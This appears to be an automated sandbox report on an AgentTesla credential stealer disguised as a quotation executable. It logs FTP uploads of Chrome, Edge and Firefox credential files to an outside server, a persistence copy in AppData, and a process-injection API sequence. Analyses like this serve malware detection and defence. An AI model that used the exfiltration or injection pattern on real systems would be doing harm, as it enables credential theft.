                                                        Oct 3, 2024 14:29:22.513921976 CEST6291821192.168.2.11192.254.225.136PWD
                                                        Oct 3, 2024 14:29:22.679711103 CEST2162918192.254.225.136192.168.2.11257 "/" is your current location
                                                        Oct 3, 2024 14:29:22.680447102 CEST6291821192.168.2.11192.254.225.136TYPE I
                                                        Oct 3, 2024 14:29:22.836561918 CEST2162918192.254.225.136192.168.2.11200 TYPE is now 8-bit binary
                                                        Oct 3, 2024 14:29:22.836925983 CEST6291821192.168.2.11192.254.225.136PASV
                                                        Oct 3, 2024 14:29:22.991561890 CEST2162918192.254.225.136192.168.2.11227 Entering Passive Mode (192,254,225,136,124,97)
                                                        Oct 3, 2024 14:29:22.997648001 CEST6291821192.168.2.11192.254.225.136STOR CO_Chrome_Default.txt_user-179605_2024_10_03_09_19_18.txt
                                                        Oct 3, 2024 14:29:23.480211020 CEST2162918192.254.225.136192.168.2.11150 Accepted data connection
                                                        Oct 3, 2024 14:29:23.636200905 CEST2162918192.254.225.136192.168.2.11226-File successfully transferred
                                                        226-File successfully transferred226 0.156 seconds (measured here), 1.81 Kbytes per second
                                                        Oct 3, 2024 14:29:23.637932062 CEST6291821192.168.2.11192.254.225.136PASV
                                                        Oct 3, 2024 14:29:23.794596910 CEST2162918192.254.225.136192.168.2.11227 Entering Passive Mode (192,254,225,136,177,210)
                                                        Oct 3, 2024 14:29:23.800286055 CEST6291821192.168.2.11192.254.225.136STOR CO_Edge Chromium_Default.txt_user-179605_2024_10_03_12_48_42.txt
                                                        Oct 3, 2024 14:29:24.284827948 CEST2162918192.254.225.136192.168.2.11150 Accepted data connection
                                                        Oct 3, 2024 14:29:24.441698074 CEST2162918192.254.225.136192.168.2.11226 File successfully transferred
                                                        Oct 3, 2024 14:29:24.444889069 CEST6291821192.168.2.11192.254.225.136PASV
                                                        Oct 3, 2024 14:29:24.599354982 CEST2162918192.254.225.136192.168.2.11227 Entering Passive Mode (192,254,225,136,191,73)
                                                        Oct 3, 2024 14:29:24.609854937 CEST6291821192.168.2.11192.254.225.136STOR CO_Firefox_bhsw2cld.default-release.txt_user-179605_2024_10_03_13_58_18.txt
                                                        Oct 3, 2024 14:29:25.088445902 CEST2162918192.254.225.136192.168.2.11150 Accepted data connection
                                                        Oct 3, 2024 14:29:25.250185966 CEST2162918192.254.225.136192.168.2.11226 File successfully transferred

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:08:28:10
                                                        Start date:03/10/2024
                                                        Path:C:\Users\user\Desktop\QUOTATIONS#08670.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\QUOTATIONS#08670.exe"
                                                        Imagebase:0xc00000
                                                        File size:1'330'176 bytes
                                                        MD5 hash:B88A9908634769557E2B6396F634C4AE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2019882237.0000000004E50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2008575393.0000000002691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:08:28:45
                                                        Start date:03/10/2024
                                                        Path:C:\Users\user\Desktop\QUOTATIONS#08670.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\QUOTATIONS#08670.exe"
                                                        Imagebase:0xc00000
                                                        File size:1'330'176 bytes
                                                        MD5 hash:B88A9908634769557E2B6396F634C4AE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2575902767.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2575902767.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2575902767.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        General

                                                        Target ID:8
                                                        Start time:08:29:28
                                                        Start date:03/10/2024
                                                        Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                        Imagebase:0x9b0000
                                                        File size:1'330'176 bytes
                                                        MD5 hash:B88A9908634769557E2B6396F634C4AE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000008.00000002.2575551377.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 24%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:false

                                                        General

                                                        Target ID:9
                                                        Start time:08:29:36
                                                        Start date:03/10/2024
                                                        Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                        Imagebase:0x9b0000
                                                        File size:1'330'176 bytes
                                                        MD5 hash:B88A9908634769557E2B6396F634C4AE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000009.00000002.2575069317.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false

                                                        General

                                                        Target ID:10
                                                        Start time:08:30:02
                                                        Start date:03/10/2024
                                                        Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                        Wow64 process (32bit):
                                                        Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                        Imagebase:
                                                        File size:1'330'176 bytes
                                                        MD5 hash:B88A9908634769557E2B6396F634C4AE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        General

                                                        Target ID:12
                                                        Start time:08:30:09
                                                        Start date:03/10/2024
                                                        Path:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                        Wow64 process (32bit):
                                                        Commandline:"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                                                        Imagebase:
                                                        File size:1'330'176 bytes
                                                        MD5 hash:B88A9908634769557E2B6396F634C4AE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:16.4%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:6.3%
                                                          Total number of Nodes:95
                                                          Total number of Limit Nodes:7
                                                          execution_graph 53639 792cf10 53640 792cf50 ResumeThread 53639->53640 53642 792cf81 53640->53642 53643 792b890 53644 792b8d5 Wow64GetThreadContext 53643->53644 53646 792b91d 53644->53646 53742 712acd0 53743 712ad16 DeleteFileW 53742->53743 53745 712ad4f 53743->53745 53746 792d450 53747 792d5db 53746->53747 53749 792d476 53746->53749 53749->53747 53750 7927900 53749->53750 53751 792d6d0 PostMessageW 53750->53751 53752 792d73c 53751->53752 53752->53749 53761 7920a70 53762 7920a83 53761->53762 53763 79226b1 VirtualProtect 53761->53763 53764 79226b8 VirtualProtect 53761->53764 53763->53762 53764->53762 53647 7922197 53651 79226b1 53647->53651 53654 79226b8 53647->53654 53648 79221a8 53652 7922700 VirtualProtect 53651->53652 53653 792273a 53652->53653 53653->53648 53655 7922700 VirtualProtect 53654->53655 53656 792273a 53655->53656 53656->53648 53753 792075b 53755 79226b1 VirtualProtect 53753->53755 53756 79226b8 VirtualProtect 53753->53756 53754 792076c 53755->53754 53756->53754 53657 792fd18 CloseHandle 53658 792fd7f 53657->53658 53722 792c2b8 53723 792c300 WriteProcessMemory 53722->53723 53725 792c357 53723->53725 53765 792bf78 53766 792bfb8 VirtualAllocEx 53765->53766 53768 792bff5 53766->53768 53663 85d01c 53664 85d034 53663->53664 53665 85d08e 53664->53665 53668 57e0c48 53664->53668 53674 57e0c39 53664->53674 53669 57e0c75 53668->53669 53670 57e0ca7 53669->53670 53680 57e0e9c 53669->53680 53686 57e0dc0 53669->53686 53691 57e0dd0 53669->53691 53675 57e0c75 53674->53675 53676 57e0ca7 53675->53676 53677 57e0e9c CallWindowProcW 53675->53677 53678 57e0dd0 CallWindowProcW 53675->53678 53679 57e0dc0 CallWindowProcW 53675->53679 53677->53676 53678->53676 53679->53676 53681 57e0e5a 53680->53681 53682 57e0eaa 53680->53682 53696 57e0e78 53681->53696 53700 57e0e88 53681->53700 53683 57e0e70 53683->53670 53687 57e0de4 53686->53687 53689 57e0e78 CallWindowProcW 53687->53689 53690 57e0e88 CallWindowProcW 53687->53690 53688 57e0e70 53688->53670 53689->53688 53690->53688 53693 57e0de4 53691->53693 53692 57e0e70 53692->53670 53694 57e0e78 CallWindowProcW 53693->53694 53695 57e0e88 CallWindowProcW 53693->53695 53694->53692 53695->53692 53697 57e0e88 53696->53697 53698 57e0e99 53697->53698 53703 57e229e 53697->53703 53698->53683 53701 57e229e CallWindowProcW 53700->53701 53702 57e0e99 53700->53702 53701->53702 53702->53683 53704 57e22aa 53703->53704 53705 57e2306 53703->53705 53710 57e231e 53704->53710 53705->53704 53706 57e2308 53705->53706 53707 57e231e CallWindowProcW 53706->53707 53711 57e2332 53710->53711 53713 57e22da 53710->53713 53712 57e238a CallWindowProcW 53711->53712 53711->53713 53712->53713 53713->53698 53726 7924b2b 53727 7924b6b 53726->53727 53728 7924f99 53727->53728 53730 7927948 53727->53730 53732 792796f 53730->53732 53731 7927a33 53731->53727 53732->53731 53734 7929cd0 53732->53734 53735 7929d4f CreateProcessAsUserW 53734->53735 53737 7929e50 53735->53737 53714 792ca08 53715 792ca50 VirtualProtectEx 53714->53715 53717 792ca8e 53715->53717 53738 792cca8 53739 792cced Wow64SetThreadContext 53738->53739 53741 792cd35 53739->53741

                                                          Executed Functions

                                                          Function 008F86F9 Relevance: 12.2, Strings: 9, Instructions: 914COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (o_q$(o_q$(o_q$(o_q$(o_q$(o_q$(o_q$,cq$,cq
                                                          • API String ID: 0-2006360050
                                                          • Opcode ID: d74994aab7c5d4cabda46c721ba472089f37f69ade2f4e92f9ce96bf7bbd41f9
                                                          • Instruction ID: 7082467a15f57873c23fae007cc222cd947258cac36768a3797d34e5b154406a
                                                          • Opcode Fuzzy Hash: d74994aab7c5d4cabda46c721ba472089f37f69ade2f4e92f9ce96bf7bbd41f9
                                                          • Instruction Fuzzy Hash: B9822630A00209DFCB14CF68D984AAEBBF2FF88314F158569E555EB2A5DB30ED41CB61
                                                          Function 06D2B8A0 Relevance: 11.0, Strings: 8, Instructions: 975COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 281 6d2b8a0-6d2ea67 284 6d2ec15-6d2ec66 281->284 285 6d2ea6d-6d2ea73 281->285 310 6d2ec80-6d2ec8d 284->310 311 6d2ec68-6d2ec75 284->311 286 6d2eab4-6d2eac8 285->286 287 6d2ea75-6d2ea7c 285->287 289 6d2eaea-6d2eaf3 286->289 290 6d2eaca-6d2eace 286->290 291 6d2ea96-6d2eaaf call 6d2ce84 287->291 292 6d2ea7e-6d2ea8b 287->292 294 6d2eaf5-6d2eb02 289->294 295 6d2eb0d-6d2eb29 289->295 290->289 293 6d2ead0-6d2eadc 290->293 291->286 292->291 293->289 304 6d2eade-6d2eae4 293->304 294->295 306 6d2ebd1-6d2ebf5 295->306 307 6d2eb2f-6d2eb3a 295->307 304->289 318 6d2ebf7 306->318 319 6d2ebff-6d2ec00 306->319 315 6d2eb52-6d2eb59 307->315 316 6d2eb3c-6d2eb42 307->316 314 6d2ec95-6d2ec9a 310->314 311->310 320 6d2ece1-6d2ece8 314->320 321 6d2ec9c-6d2eca3 314->321 324 6d2eb5b-6d2eb65 315->324 325 6d2eb6d-6d2eb90 call 6d2a26c 315->325 322 6d2eb46-6d2eb48 316->322 323 6d2eb44 316->323 318->319 319->284 329 6d2ed02-6d2ed0b 320->329 330 6d2ecea-6d2ecf7 320->330 327 6d2eca5-6d2ecb2 321->327 328 6d2ecbd-6d2ecd2 321->328 322->315 323->315 324->325 338 6d2eb92-6d2eb9f 325->338 339 6d2eba1-6d2ebb2 325->339 327->328 328->320 342 6d2ecd4-6d2ecdb 328->342 332 6d2ed11-6d2ed14 329->332 333 6d2ed0d-6d2ed0f 329->333 330->329 337 6d2ed15-6d2ed26 332->337 333->337 347 6d2ed28-6d2ed2f 337->347 348 6d2ed69-6d2ed6c 337->348 338->339 349 6d2ebbf-6d2ebcb 338->349 339->349 350 6d2ebb4-6d2ebb7 339->350 342->320 346 6d2ed6f-6d2ed9a call 6d26880 342->346 360 6d2eda1-6d2ee02 call 6d26880 346->360 352 6d2ed31-6d2ed3e 347->352 353 6d2ed49-6d2ed5e 347->353 349->306 349->307 350->349 352->353 353->348 359 6d2ed60-6d2ed67 353->359 359->348 359->360 369 6d2ee04-6d2ee17 360->369 370 6d2ee1a-6d2ee20 360->370 371 6d2ee22-6d2ee29 370->371 372 6d2ee90-6d2eee8 370->372 374 6d2eeef-6d2ef47 371->374 375 6d2ee2f-6d2ee3f 371->375 372->374 380 6d2ef4e-6d2f05c 374->380 379 6d2ee45-6d2ee49 375->379 375->380 383 6d2ee4c-6d2ee4e 379->383 422 6d2f0ae-6d2f106 380->422 423 6d2f05e-6d2f06e 380->423 385 6d2ee73-6d2ee75 383->385 386 6d2ee50-6d2ee60 383->386 389 6d2ee77-6d2ee81 385->389 390 6d2ee84-6d2ee8d 385->390 395 6d2ee62-6d2ee71 386->395 396 6d2ee4b 386->396 395->385 395->396 396->383 427 6d2f10d-6d2f21a 422->427 426 6d2f074-6d2f078 423->426 423->427 429 6d2f07b-6d2f07d 426->429 461 6d2f232-6d2f238 427->461 462 6d2f21c-6d2f22f 427->462 431 6d2f091-6d2f093 429->431 432 6d2f07f-6d2f08f 429->432 434 6d2f0a2-6d2f0ab 431->434 435 6d2f095-6d2f09f 431->435 432->431 439 6d2f07a 432->439 439->429 463 6d2f2b2-6d2f30a 461->463 464 6d2f23a-6d2f241 461->464 466 6d2f311-6d2f369 463->466 464->466 467 6d2f247-6d2f24b 464->467 468 6d2f370-6d2f3d5 466->468 467->468 469 6d2f251-6d2f255 467->469 504 6d2f3d6-6d2f454 468->504 471 6d2f258-6d2f265 469->471 478 6d2f267-6d2f277 471->478 479 6d2f28a-6d2f297 471->479 486 6d2f257 478->486 487 6d2f279-6d2f288 478->487 489 6d2f2a6-6d2f2af 479->489 490 6d2f299-6d2f2a3 479->490 486->471 487->479 487->486 516 6d2f456-6d2f474 504->516 517 6d2f4d0-6d2f528 516->517 518 6d2f476-6d2f47a 516->518 520 6d2f52f-6d2f5b4 517->520 519 6d2f480-6d2f484 518->519 518->520 521 6d2f487-6d2f494 519->521 549 6d2f5b7-6d2f610 520->549 526 6d2f496-6d2f4a6 521->526 527 6d2f4a8-6d2f4b5 521->527 526->527 536 6d2f486 526->536 533 6d2f4b7-6d2f4c1 527->533 534 6d2f4c4-6d2f4cd 527->534 536->521 557 6d2f612-6d2f628 549->557 560 6d2f640-6d2f641 557->560 561 6d2f62a-6d2f630 557->561 562 6d2f632 561->562 563 6d2f634-6d2f636 561->563 562->560 563->560
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2022576283.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6d20000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (cq$Hcq$Hcq$Hcq$Hcq$Hcq$Hcq$PH_q
                                                          • API String ID: 0-3937201477
                                                          • Opcode ID: 5cdbf5e4b9739be7e9b26509e8801f08869731a19cf3033b557c65d770748aee
                                                          • Instruction ID: a30738818236b65783888204d08f33717d49604d5c9686890943b72a5bc926ff
                                                          • Opcode Fuzzy Hash: 5cdbf5e4b9739be7e9b26509e8801f08869731a19cf3033b557c65d770748aee
                                                          • Instruction Fuzzy Hash: 3172E430B402158FDB58EB78C85466E7BA2FFD8314F248969E516DB3A5CE30DC0ACB91
                                                          Function 008F79B8 Relevance: 9.6, Strings: 7, Instructions: 892COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (o_q$(o_q$(o_q$(o_q$,cq$,cq$Hcq
                                                          • API String ID: 0-3730146716
                                                          • Opcode ID: f62ad729d09560efbee698135f9b671a3f27cec4707e9d0fb85dab5b81963682
                                                          • Instruction ID: 7a264134999514bff5db83465189ffa59aa14d32728deff6f4d92794ba2df036
                                                          • Opcode Fuzzy Hash: f62ad729d09560efbee698135f9b671a3f27cec4707e9d0fb85dab5b81963682
                                                          • Instruction Fuzzy Hash: C8723870A00219DFDB14DF69C894ABEBBB6FF88300F248569E905EB3A5DB309D45CB50
                                                          Function 071E21E5 Relevance: 5.5, Instructions: 5512COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1133 71e21e5-71e2447 1162 71e44ad-71e475b 1133->1162 1163 71e244d-71e3160 1133->1163 1230 71e5640-71e65da 1162->1230 1231 71e4761-71e5638 1162->1231 1562 71e3166-71e34d8 1163->1562 1563 71e34e0-71e44a5 1163->1563 1792 71e6960-71e6973 1230->1792 1793 71e65e0-71e6958 1230->1793 1231->1230 1562->1563 1563->1162 1797 71e6979-71e6fad 1792->1797 1798 71e6fb5-71e7e47 1792->1798 1793->1792 1797->1798 2181 71e7e47 call 71e98cc 1798->2181 2182 71e7e47 call 71e98bd 1798->2182 2179 71e7e4d-71e7e54 2181->2179 2182->2179
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 230b657808acf76b724b7b6b8396cd678936bfca0682c68df71198f1d5359feb
                                                          • Instruction ID: 2cff97f5f852eef1cd12817b518894d2ed67f0175fce6606a1d98ea5461fc940
                                                          • Opcode Fuzzy Hash: 230b657808acf76b724b7b6b8396cd678936bfca0682c68df71198f1d5359feb
                                                          • Instruction Fuzzy Hash: E2B33970E11218CFCB68EF78D9996ACBBB2BB89300F4055E9D049A72A4EF345D85CF51
                                                          Function 071E2210 Relevance: 5.5, Instructions: 5499COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2183 71e2210-71e2447 2211 71e44ad-71e475b 2183->2211 2212 71e244d-71e3160 2183->2212 2279 71e5640-71e65da 2211->2279 2280 71e4761-71e5638 2211->2280 2611 71e3166-71e34d8 2212->2611 2612 71e34e0-71e44a5 2212->2612 2841 71e6960-71e6973 2279->2841 2842 71e65e0-71e6958 2279->2842 2280->2279 2611->2612 2612->2211 2846 71e6979-71e6fad 2841->2846 2847 71e6fb5-71e7e47 2841->2847 2842->2841 2846->2847 3230 71e7e47 call 71e98cc 2847->3230 3231 71e7e47 call 71e98bd 2847->3231 3228 71e7e4d-71e7e54 3230->3228 3231->3228
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 16b654dd74ab33978fbb327345587aa9ff50e1564071c1fb5f64a6a7af9086ed
                                                          • Instruction ID: 6524015cf907289f2ccebe1b513fd432d35d599d97bfa797ab8e79eb3fbbafaf
                                                          • Opcode Fuzzy Hash: 16b654dd74ab33978fbb327345587aa9ff50e1564071c1fb5f64a6a7af9086ed
                                                          • Instruction Fuzzy Hash: 55B32970E11218CFCB68EF78D9996ACBBB2BB89300F4055E9D049A72A4EF345D85CF51
                                                          Function 07123538 Relevance: 5.2, Instructions: 5237COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 4188 7123538-7123740 5141 7123742 call 7129dd0 4188->5141 5142 7123742 call 7129de0 4188->5142 4211 7123748-7128cf6 call 712a480 5140 7128cfc-7128d03 4211->5140 5141->4211 5142->4211
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024406151.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7120000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cceb6de57bb2c6024ac8b29d7644bad07b4a8c1d1356f07c3537b7111376caf5
                                                          • Instruction ID: 642e80240f584a7640689e2eb7f2ed8414378b904653ea69d3219c7c68a34f26
                                                          • Opcode Fuzzy Hash: cceb6de57bb2c6024ac8b29d7644bad07b4a8c1d1356f07c3537b7111376caf5
                                                          • Instruction Fuzzy Hash: 05B30A70E112198FCB24FF38E99966CBBF2BB89200F4185E9D488A3294DF345D95CF95
                                                          Function 0792A250 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5144 792a250-792a275 5145 792a277 5144->5145 5146 792a27c-792a2a0 5144->5146 5145->5146 5147 792a2a1 5146->5147 5148 792a2a8-792a2c4 5147->5148 5149 792a2c6 5148->5149 5150 792a2cd-792a2ce 5148->5150 5149->5147 5149->5150 5151 792a493-792a4c6 call 79237d8 5149->5151 5152 792a2d3-792a2f7 5149->5152 5153 792a4f3-792a4fc 5149->5153 5154 792a2f9-792a30a 5149->5154 5155 792a3fd 5149->5155 5156 792a3c2-792a3f5 call 7928590 5149->5156 5157 792a320-792a328 5149->5157 5158 792a426-792a429 5149->5158 5159 792a366-792a37e 5149->5159 5160 792a4e5-792a4ee 5149->5160 5161 792a3aa-792a3bd 5149->5161 5162 792a448-792a460 5149->5162 5163 792a4ce-792a4e0 5149->5163 5150->5153 5151->5163 5152->5148 5179 792a32a-792a32c 5154->5179 5180 792a30c-792a31e 5154->5180 5172 792a406-792a421 5155->5172 5156->5155 5165 792a32f-792a33a 5157->5165 5174 792a432-792a443 5158->5174 5182 792a380-792a38f 5159->5182 5183 792a391-792a398 5159->5183 5160->5148 5161->5148 5177 792a462-792a471 5162->5177 5178 792a473-792a47a 5162->5178 5163->5148 5169 792a33c-792a34b 5165->5169 5170 792a34d-792a354 5165->5170 5181 792a35b-792a361 5169->5181 5170->5181 5172->5148 5174->5148 5184 792a481-792a48e 5177->5184 5178->5184 5179->5165 5180->5148 5181->5148 5187 792a39f-792a3a5 5182->5187 5183->5187 5184->5148 5187->5148
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: e\1$e\1$"*p$"*p
                                                          • API String ID: 0-1513742261
                                                          • Opcode ID: 5f46f49be4a6ad4894982d911111a3f0881bf5209f53d729804da3dfa541a2cf
                                                          • Instruction ID: 714c757d59ff145c4ada27db49e096d11c4703d5ea9ad298b6597b0daceb626f
                                                          • Opcode Fuzzy Hash: 5f46f49be4a6ad4894982d911111a3f0881bf5209f53d729804da3dfa541a2cf
                                                          • Instruction Fuzzy Hash: 648123B1D052298FCB14DFA5D9446EEBBF2FF89304F20952AC816BB258D7785A02CF54
